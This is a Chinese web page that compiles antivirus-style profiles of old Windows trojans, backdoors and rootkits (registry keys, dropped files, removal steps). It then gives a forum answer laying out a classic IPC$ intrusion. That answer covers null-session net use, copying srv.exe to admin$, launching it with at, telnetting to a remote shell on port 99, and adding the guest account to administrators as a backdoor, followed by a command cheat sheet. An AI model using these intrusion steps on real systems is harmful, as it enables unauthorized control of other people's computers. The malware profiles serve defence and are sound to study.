黑客网络游戏代码_黑客在网络游戏指令

hacker|
222

BACKDOOR病毒

你可以自己看看

如今盗号较多,请大家保护自己的电脑安全,列出以下常用盗号木马,请大家注意~!

一、“灰鸽子”

病毒名称:Backdoor/Huigezi

病毒中文名:“灰鸽子”

病毒类型:后门

危险级别:★

影响平台: Win 9X/ME/NT/2000/XP

描述:Backdoor/Huigezi.cm“灰鸽子”变种cm是一个未经授权远程访问用户计算机的后门。“灰鸽子”变种cm运行后,自我复制到系统目录下。修改注册表,实现开机自启。侦听黑客指令,记录键击,盗取用户机密信息,例如用户拨号上网口令,URL密码等。利用挂钩API函数隐藏自我,防止被查杀。另外,“灰鸽子”变种cm可下载并执行特定文件,发送用户机密信息给黑客等。

二、“传奇窃贼”

病毒名称:Trojan/PSW.LMir

病毒中文名:“传奇窃贼”

病毒类型:木马

危险级别:★

影响平台: Win 9x/2000/XP/NT/Me

描述:传奇窃贼是专门窃取网络游戏“传奇2”登录帐号密码的木马程序。该木马运行后,主程序文件自己复制到系统目录下。修改注册表,实现开机自启。终止某些防火墙、杀毒软件进程。病毒进程被终止后,会自动重启。窃取“传奇2”帐号密码,并将盗取的信息发送给黑客。

三、“高波”

病毒名称:Backdoor/Agobot

病毒中文名:“高波”

病毒类型:后门

危险级别:★★

影响平台:Win 2000/XP/NT

描述:Backdoor/Agobot.aky “高波变种”aky是一个经UPX压缩,主要利用网络弱密码共享进行传播的后门程序。该后门程序还可利用微软DCOM RPC漏洞提升权限,允许黑客利用IRC通道远程进入用户计算机。该程序运行后,程序文件自我复制到系统目录下,并修改注册表,以实现程序的开机自启。开启黑客指定的TCP端口。连接黑客指定的IRC通道,侦听黑客指令。黑客通过该后门在用户计算机上可进行的操作有:安装并升级病毒程序;下载并运行指定文件;盗取用户系统信息并发送给作者等。利用程序自带的密码字典破解网络共享弱密码。盗取黑客所指定的多种游戏的序列号,终止某些防火墙及杀毒软件的进程。该程序可执行DoS攻击。

并列第三:“瑞波”

病毒名称:Backdoor/RBot.auv

病毒中文名:“瑞波”

病毒类型:后门

危险级别:★★

影响平台: Windows 2000/XP/2003

描述:该变种病毒经过多层压缩加密壳处理,可以利用多种系统漏洞进行传播,感染能力很强。中毒计算机将被黑客完全控制,成为"僵尸电脑"。由于此病毒会扫描感染目标,因此可以造成局域网拥堵,该网友反映的情况很有可能是中了“瑞波”病毒。

四、“CHM木马”

病毒名称:Exploit.MhtRedir

病毒中文名:“CHM木马”

病毒类型:木马、脚本

危险级别:★★

影响平台:Windows 98/ME/NT/2000/XP/2003

描述:

利用IE浏览器MHTML跨安全区脚本执行漏洞(MS03-014)的恶意网页脚本,

自从2003年以来,一直是国内最为流行的种植网页木马的恶意代码类型,

2005年下半年,泛滥趋势稍有减弱,2006年上半年的感染数量仍然很大,

没有短期内消亡的迹象。

五、“WMF漏洞利用者”

病毒名称:Exploit.MsWMF

病毒中文名:“WMF漏洞利用者”

病毒类型:木马

危险级别:★★

影响平台:Win 9X/ME/NT/2000/XP/2003

描述: Exploit.MsWMF.a“WMF漏洞利用者”变种a是一个利用微软MS06-001漏洞进行传播的木马。如果用户使用未打补丁的Windows系统,在上网浏览、本地打开或预览恶意WMF文件时,自动下载网络上的其它病毒文件,侦听黑客指令,对用户计算机进行各种攻击。

六、“QQ大盗”

病毒名称:Trojan/QQPass

病毒中文名:“QQ大盗”

病毒类型:木马

危险级别:★

影响平台:Win9X/2000/XP/NT/Me

描述: Trojan/QQPass.ak是用Delphi编写并经UPX压缩的木马,用来窃取游戏"传奇"信息。

传播过程及特征:

1.创建下列文件:

%System%winsocks.dll, 91136字节

%Windir%intren0t.exe, 91136字节

2.修改注册表:

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]

"Intren0t" = %Windir%intren0t.exe

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices]

"Intren0t" = %Windir%intren0t.exe

这样,在Windows启动时,病毒就可以自动执行。

注:%Windir%为变量,一般为C:Windows 或 C:Winnt;

%System%为变量,一般为C:WindowsSystem (Windows 95/98/Me), C:WinntSystem32 (Windows NT/2000),

或 C:WindowsSystem32 (Windows XP)。

七、维京

病毒名称:Worm/Viking

病毒中文名:维京

病毒类型:蠕虫、木马

危险级别:★★★

影响平台:Windows 98/ME/NT/2000/XP/2003

描述:该病毒同时具有文件型病毒、蠕虫病毒、病毒下载器等类病毒的特点,进入用户的电脑之后,它会从网上疯狂下载多个木马、QQ尾巴等安装在中毒电脑中,窃取用户的网络游戏密码,严重时造成系统完全崩溃。该病毒同时具有文件型病毒、蠕虫病毒、病毒下载器等类病毒的特点,进入用户的电脑之后,它会从网上疯狂下载多个木马、QQ尾巴等安装在中毒电脑中,窃取用户的网络游戏密码,严重时造成系统完全崩溃。

八、“传华木马”

病毒名称:Trojan/PSW.Chuanhua

病毒中文名:“传华木马”

病毒类型:木马

危险级别:★★

影响平台:Windows 98/ME/NT/2000/XP/2003

描述:

出自同一个木马制作组织“传华”的若干木马变种。“传华木马”主要以盗取QQ或网络游戏的帐号密码为目的,变种极多,感染了大量用户。

九、“工行钓鱼木马”

病毒名称:TrojanSpy.Banker.yy

病毒中文名:“工行钓鱼木马”

病毒类型:木马

危险级别:★★★

影响平台:Windows 98/ME/NT/2000/XP/2003

描述:这是一个十分狡猾的盗取网上银行密码的木马病毒。病毒运行后,在系统目录下生成svchost.exe文件,然后修改注册表启动项以使病毒文件随操作系统同时运行。

病毒运行后,会监视微软IE浏览器正在访问的网页,如果发现用户在工行网上银行个人银行登录页面上输入了帐号、密码,并进行了提交,就会弹出伪造的IE窗,内容如下: “为了给您提供更加优良的电子银行服务,6月25日我行对电子银行系统进行了升级。请您务必修改以上信息!”

病毒以此诱骗用户重新输入密码,并将窃取到的密码通过邮件发送到一个指定的163信箱。该病毒同时还会下载灰鸽子后门病毒,感染灰鸽子的用户系统将被黑客远程完全控制。

十、“敲诈者”

病毒名称:Trojan/Agent.bq

病毒中文名:“敲诈者”

病毒类型:木马

危险级别:★★★

影响平台:Win 9X/ME/NT/2000/XP/2003

描述: 毒在本地磁盘根目录下建立一个属性为系统、隐藏和只读的备份文件夹,名为“控制面板.{ 21EC2020-3AEA-1069-A2DD-08002B30309D}”,同时搜索本地磁盘上的用户常用格式文档(包括.xls、.doc、.mdb、.ppt、wps、.zip、.rar),把搜索到的文件移动到上述备份文件夹中,造成用户常用文档丢失的假象。

为什么我一启动网络游戏就一大堆病毒

机器狗/磁碟机/AV终结者专杀工具

AUTO木马群专杀工具

3.16-3.31感染量上升最快的10大病毒分析及解决方案

爱毒霸社区提醒您注意,近期肆虐的病毒木马中,排名靠前,对用户产生重大影响的,多数是木马或木马下载器。对付这类病毒,通常需要综合运用毒霸和金山清理专家,因为病毒自身变化多端,杀毒软件不能保证检测到所有变种。某些情况下,您可能需要充分使用金山清理专家来处理。

具体请查看:关于清理专家反复报告发现某恶意软件的处理办法

论坛的新手杀毒专区提供了对新会员最有价值的帮助信息,建议您阅读这里的帮助文档尝试自助解决。

在两周左右的时间里,磁碟机作者停止了更新。遗憾的是,这并非安全软件的功劳,某种程度上讲,是这个制造、传播这个病毒的集团过于疯狂,以致引起各安全厂商的强烈反弹,黑客产业链的某些人不得不暂时低调,以避风头,磁碟机病毒卷土重来的可能性非常大。

目前,上周末出现Auto病毒入侵相当严重,毒霸客服中心日接到与Auto病毒相关的案例多达200左右,虽尚不能和磁碟机高峰时相比,同一种病毒引发上百咨询需要引起我们和用户的足够警惕。

以下是本周10大病毒列表:

1.Auto病毒群(auto.exe)

详细信息,参阅

2.磁碟机病毒家族(Worm.Vcting)

详细信息,参阅

3.机器狗病毒(机器狗变种Win32.Troj.Agent.dz.11636)

详细信息,请参考机器狗病毒的详细技术分析

4.JS.fullexploit.ca.4678(乌鸦喝水4678)

感染日志类似于:

引用:

病毒名称JS.fullexploit.ca.4678,文件名称count2[1].htm 原始路径C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\O18HEZOP\

病毒名称(中文):乌鸦喝水4678

威胁级别:★★☆☆☆

病毒类型:网页病毒

病毒长度:4678

影响系统:Win9x WinMe WinNT Win2000 WinXP Win2003

病毒行为:

引用:

这是一个溢出漏洞利用脚本病毒,主要针对baidubar,超星阅读器,联众,暴风影音,realplayer,迅雷,一旦溢出,会从指定网址下载恶意程序执行.访问网络的时候访问网络的时候挂马传播.

1.一旦病毒脚本溢出成功后,会从上下载木马程序运行

2.该溢出脚本对应的漏洞溢出模块的CSLID如下:

baidubar: A7F05EE4-0426ID:-454F-8013-C41E3596E9E9

BAOFEN: 6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB

LINK(联众): AE93C5DF-A990-11D1-AEBD-5254ABDD2B69

超星: 7F5E27CE-4A5C-11D3-9232-0000B48A05B2

迅雷: F3E70CEA-956E-49CC-B444-73AFE593AD7F

受影响的realplayer版本号:

“Windows RealPlayer 10.5 (6.0.12.1040-1056)”、

“Windows RealPlayer 10”、

“Windows RealOne Player v2 (6.0.11.853 - 872)”、

“Windows RealOne Player v2 (6.0.11.818 - 840)”

解决方案:这类病毒是攻击第三方软件漏洞传播,应该在杀毒完成之后,下载相应软件的最新版本,以修复相关漏洞。

5.Win32.Troj.PcClient.a.688128

毒霸07.11.28.18版本即可查杀。

病毒名称(中文):黑客遥控器

威胁级别:★☆☆☆☆

病毒类型:黑客程序

病毒长度:688128

影响系统:Win9x WinMe WinNT Win2000 WinXP Win2003

病毒行为:

引用:

这是一个黑客程序变种。病毒运行后释放随机文件名病毒文件至系统文件夹,并通过修改注册表添加系统服务rtltvb以开机自启动。病毒尝试读取以下两个注册表ProxyEnable和ProxyServer键值来获取用户代理服务器地址,并记录至{随机文件名}.pro。病毒还尝试在后台创建多个线程与远程服务器通讯,接受黑客的指令,使得用户的计算机完全处于黑客的控制之下。

(1)病毒释放文件,然后使用DeleteFileA删除自身

%sys32dir%\0004bb58.inf

%sys32dir%\{随机文件名}.dll(如byhfjm.dll)

%sys32dir%\{随机文件名}.KEY(如byhfjm.KEY)

%sys32dir%\{随机文件名}.sco(如byhfjm.sco)

%sys32dir%\drivers\{随机文件名}.sys(如byhfjm.sys)

(2)病毒增加注册项

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost rtltvb rtltvb

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RTLTVB

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\rtltvb

(3)病毒尝试添加一个系统服务rtltvb

服务名:rtltvb

描述:Microsoft .NET Framework TPM

显示名称:rtltvb

映像路径:%sys32dir%\svchost.exe -k rtltvb

启动类型:自动

(4)病毒尝试读取以下两个注册表ProxyEnable和ProxyServer键值来获取用户代理服务器地址,并记录至{随机文件名}.pro(如byhfjm.pro)

"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings ProxyEnable 1"

"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings ProxyServer {代理地址}"

(5)病毒尝试在后台创建多个线程与远程服务器通讯,接受黑客的指令,使得用户的计算机完全处于黑客的控制之下

0**205.k**p.net(2**.2*7.17.2*6)

6.Win32.Troj.InjectT.gh.180736

升级毒霸到07.10.25.10版本即可查杀,病毒可通过网页挂马,或ARP攻击传播。很老的病毒现在造成大面积入侵,可能与下载器的行为有关。

查毒日志类似于

引用:

病毒 2008-03-11 22:43:46 C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\XFTMV4S6\29[1] Win32.Troj.InjectT.gh.180736 清除成功

7.Win32.Troj.OnLineGamesT.gr.2637

查毒日志类似于

引用:

Win32.Troj.OnLineGamesT.gr.2637

Win32.Troj.OnlineGamesT.zy.123185

Win32.Troj.Agent.ol.61440

Win32.Troj.OnlineGamesT.xy.44337

Win32.Troj.OnlineGamesT.gr.2637

问题补充:而且像中了Auto木马一样,双击打不开分区(昨天打开新浪网,突然就弹出一大堆网页,之后我就恢复了系统,IE没事了,但木马还在,分区也双击打不开,重要的是清除了之后还有)

病毒分析:

引用:

病毒类型:木马

文件大小:17836 byte

二、 病毒描述:

该病毒为盗号木马类,病毒运行后衍生病毒文件至系统文件夹,并删除自身。通过修改注册表增加启动项目进行开机启动。

三、 行为分析

生成文件:

c:\WINDOWS\system32\upxdnd.dll

c:\WINDOWS\upxdnd.exe

写注册表启动项目

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "upxdnd"

Type: REG_SZ

Data: C:\WINDOWS\upxdnd.exe

将upxdnd.dll插入到EXPLORER.EXE进程和其它应用程序进程中进行监视盗号。

解决方案:

引用:

使用金山清理专家粉碎以下文件或升级到最新后查杀。

c:\WINDOWS\system32\upxdnd.dll

c:\WINDOWS\upxdnd.exe

然后使用清理专家删除以下残留的注册表启动项目:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

upxdnd

8.Win32.Troj.RootkitT.k.16800

染毒日志类似于

引用:

win32.troj.RootkitT.k.16800 在c:\windows\dirvers\vga\vmware\lgtosync.sys

病毒名称(中文):病毒保护伞16800

威胁级别:★★☆☆☆

病毒类型:黑客工具

病毒长度:16800

影响系统:Win9x WinMe WinNT Win2000 WinXP Win2003

病毒行为:

引用:

这是一个Rootkit,它的主要功能是保护其他的病毒文件

一、病毒简介

这个Rootkit主要有两个功能:

1、绕过SSDT挂钩反复写注册表

2、直接调用ntoskrnl.exe或者ntkrnlpa.exe导出的NtCreateFile打开病毒文件,使得这些文件被占用而无法被删除

二、功能分析 - 绕过SSDT挂钩反复写注册表

Rootkit运行后会再次将ntoskrnl.exe或者ntkrnlpa.exe加载到内存,并通过这个新的内存映象计算出ZwOpenKey,

ZwClose,ZwSetValueKey,ZwEnumerateKey,ZwCreateFile这5个函数在SSDT表中对应服务函数(Zw*对应的Nt*函数)

的真实地址。随后Rookit创建一个线程不断的写注册表(Rootkit的服务项)。

三、功能分析 - 占用文件

Rootkit调用刚才得到的NtCreateFile打开%systemroot%\system32\drivers\gxni6qsaoe.sys和%systemroot%\system32

\mlxw81h.dll这两个文件,使这两个文件被占用,从而无法被删除。(这两个文件的名字都是随机的)。

Rootkit调用PsSetCreateProcessNotifyRoutine函数监视进程的创建。如果userinit.exe被创建,Rootkit通过写注册表

启动项运行%systemroot%\system32\mlxw81h.dll。如果explorer.exe被创建,Rootkit调用NtCreateFile占用前面提到

的两个病毒文件。

9.Win32.Troj.AgentT.fm.14452

病毒分析:

病毒名称(中文):网游盗贼14452

威胁级别:★★☆☆☆

病毒类型:偷密码的木马

病毒长度:14452

影响系统:Win9x WinMe WinNT Win2000 WinXP Win2003

病毒行为:

引用:

这是一个网游盗号木马的变种,它盗取的游戏众多。它会强行关闭正在运行中的网络游戏,使得玩家不得不重新登录。这样,病毒便可趁机盗窃用户帐号。

1.病毒运行后,产生以下病毒文件(文件名不定)

C:\WINDOWS\system32\avzxest.exe

C:\WINDOWS\system32\avzxemn.dll

C:\WINDOWS\system32\avzxein.dll

c:\WINDOWS\Fonts\mszhasd.fon

2.将C:\WINDOWS\system32\avzxemn.dll添加到执行挂钩HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks,以便随系统启动。

3.将C:\WINDOWS\system32\avzxemn.dll添加到HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Appinit_Dlls,以便随系统启动。

4.病毒运行后,会删除自身,用户发现文件点击后消失。

5.修改注册表,禁用系统防火墙和自动更新功能。

6.不断地写2、3提到的注册表项,防止被删除。

7.关闭名为ElementClient.exe和TQAT.exe的游戏进程,以便让用户重新运行,趁机盗取用户帐号.

清除方案:

使用金山毒霸查杀或者用金山清理专家百宝箱中的文件粉碎器,将以下几个文件彻底删除。

c:\windows\system32\avzxest.exe

c:\windows\system32\avzxemn.dll

c:\windows\system32\avzxein.dll

c:\windows\Fonts\mszhasd.fon

重启后,再用清理专家修复注册表中的残留信息。

10.Win32.TrojDownloader.Agent.49152

这是一个木马下载器,升级到07年12月29日的版本即可查杀,该木马下载器可能是其它类似于磁碟机、AV终结者病毒的下载器download的产物。

查毒日志类似于

引用:

C:\WINDOWS\system32\jxz40cmy.dll中了Win32.Troj.DownLoaderT.np.139264病毒

C:\WINDOWS\system32\drivers\820p.sys中了win32.TrojDownloader.HmirT.a.25920

中木马下载器之后,往往会发现更多木马,建议使用金山清理专家和金山毒霸协同清除,如果你的杀毒软件被破坏,建议先下载金山毒霸提供的磁碟机/机器狗/AV终结者专杀来修复杀毒软件。

针对流行病毒的解决方案:

本周严重流行的病毒以Auto病毒群、磁碟机为主,这些病毒下载器入侵后,会带来严重威胁,表现为很老的木马病毒,也会完成盗号。

木马下载器入侵之后,需要采取综合措施,推荐先到毒霸论坛或官网下载“磁碟机”病毒专杀,将磁碟机清除干净后,还需要使用毒霸和清理专家全面杀毒,将系统中更多的木马完全清除干净。

详情,请参阅:

有关此类病毒的预防

参考“狗犬不惊”之防狗秘笈()

参考资料:

Trojan.PSW.Gamania.wd 是什么病毒阿?

江民今日提醒您注意:在今天的病毒中Trojan/PSW.Lineage.uc“天堂杀手”变种uc和Trojan/PSW.Gamania.b“佳美尼亚”变种b值得关注。

病毒名称:Trojan/PSW.Lineage.uc

中 文 名:“天堂杀手”变种uc

病毒长度:64000字节

病毒类型:木马

危害等级:★

影响平台:Win 9X/ME/NT/2000/XP/2003

Trojan/PSW.Lineage.uc“天堂杀手”变种uc是一个盗取网络游戏“仙境传说”用户密码的木马。“天堂杀手”变种uc运行后,自我复制到Windows目录下,并在系统目录下释放文件rodll.dll。修改注册表,实现开机自启。关闭某些与安全相关的窗口,终止某些与安全相关的进程。在已开启的窗口搜索与“仙境传说”相关的字符串,一经发现便开始记录键击,盗取网络游戏“仙境传说”用户密码,并将用户密码发送到黑客指定的邮箱里。

病毒名称:Trojan/PSW.Gamania.b

中 文 名:“佳美尼亚”变种b

病毒长度:230400字节

病毒类型:木马

危害等级:★

影响平台:Win 9X/ME/NT/2000/XP/2003

Trojan/PSW.Gamania.b“佳美尼亚”变种b是一个盗取网络游戏“天堂”账号密码的木马程序。“佳美尼亚”变种b运行后,自我复制到Windows目录下,并在系统目录下创建.dll病毒文件。修改注册表,实现开机自启。侦听黑客指令,盗取网络游戏“天堂”账号密码,并将盗取的密码发送给黑客。

针对以上病毒,江民反病毒中心建议广大电脑用户:

1、请立即升级江民杀毒软件,开启BOOTSCAN功能及各项监控,防止冲击波、震荡波等恶性病毒攻击用户计算机。BootScan是江民科技首创的在Windows 启动前杀毒的核心技术,它能彻底清除一些和操作系统绑定的病毒或者有害程序以及木马等。

2、江民KV网络版的用户请及时升级控制中心,并建议相关管理人员在适当时候进行全网查杀病毒,保证企业信息安全。

3、针对病毒利用修改注册表实现开机自启这一特点,江民杀毒软件“注册表自动修复”功能可以在第一时间清除病毒文件,对病毒破坏的系统注册表及时进行智能恢复。

4、“江民密保”可有效保护网上银行、网络游戏、支付平台、网上证券交易等账号、密码,彻底斩断“网银大盗”、“证券大盗”、“传奇窃贼”、“天堂杀手”等专门盗号的木马黑手,全面保护用户机密信息。

5、怀疑已中毒的用户可使用江民免费在线查毒进行病毒查证。免费在线查毒地址:.

有关更详尽的病毒技术资料请直接拨打江民公司的技术服务热线800-810-2300和010-82511177进行咨询,或访问江民网站进行在线查阅。

我觉得你那个应该是个变种,答得如果不对请多包涵。

我的世界的黑客指令是什么

首先按下Alt+F4,之后会弹出一个后台的选择框,之后傻子都会做了

跪求cmd黑客攻击指令和cmd电脑命令!悬赏大大滴有

一 相关命令

建立空连接:

net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

建立非空连接:

net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

映射默认共享:

net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)

如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

删除一个ipc$连接

net use \\IP\ipc$ /del

删除共享映射

net use c: /del 删除映射的c盘,其他盘类推

net use * /del 删除全部,会有提示要求按y确认

提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射网络驱动器,效果一样.

二 经典入侵模式

1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。

2. C:\copy srv.exe \\127.0.0.1\admin$

先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

3. C:\net time \\127.0.0.1

查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。

4. C:\at \\127.0.0.1 11:05 srv.exe

用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)

5. C:\net time \\127.0.0.1

再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。

6. C:\telnet 127.0.0.1 99

这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

7.C:\copy ntlm.exe \\127.0.0.1\admin$

用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

8. C:\WINNT\system32ntlm

输入ntlm启动(这里的C:\WINNT\system32指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

9.Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组

10. C:\net user guest /active:yes

将对方的Guest用户激活

11. C:\net user guest 1234

将Guest的密码改为1234,或者你要设定的密码

12. C:\net localgroup administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机).

ipc$经典入侵步骤:

1、net use \\ip\ipc$ 密码 /user:用户名

2、copy 文件名 \\ip\c$

3、net time \\ip

4、at \\ip 时间 命令

5、入侵成功,连接你的肉鸡

常用的网络命令

net user 查看用户列表

net user 用户名 密码 /add 添加用户

net user 用户名 密码 更改用户密码

net localgroup administrators 用户名 /add 添加用户到管理组

net user 用户名 /delete 删除用户

net user 用户名 查看用户的基本情况

net user 用户名 /active:no 禁用该用户

net user 用户名 /active:yes 启用该用户

net share 查看计算机IPC$共享资源

net share 共享名 查看该共享的情况

net share 共享名=路径 设置共享。例如 net share c$=c:

net share 共享名 /delete 删除IPC$共享

net stop lanmanserver 关闭ipc$和默认共享依赖的服务

net use 查看IPC$连接情况

net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接

net use \\ip\ipc$ /del 删除一个连接

net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘

net use z: /del

net time \\ip 查看远程计算机上的时间

copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上

net view ip 查看计算机上的共享资源

at 查看自己计算机上的计划作业

at \\ip 查看远程计算机上的计划作业

at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业

at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业

at \\ip all /delete 删除远程计算机上的全部计划作业

at \\ip time "echo 5 c:\t.txt" 在远程计算机上建立文本文件t.txt;

下面纯手打,上面是度娘给的

taskkill /im 进程名 停止运行

tasklisy 查看运行进程

ipconfig 查看本机IP

md 创建文件夹

rd 删除文件夹

echo off .txt|exit 添加文本

echo 内容 .txt 给文本添加内容

copy 复制文件

net user 用户名 密码/add 创建一个普通账号

net localgroup administrators 用户名 /add 把账户加入超级用户组

0条大神的评论

发表评论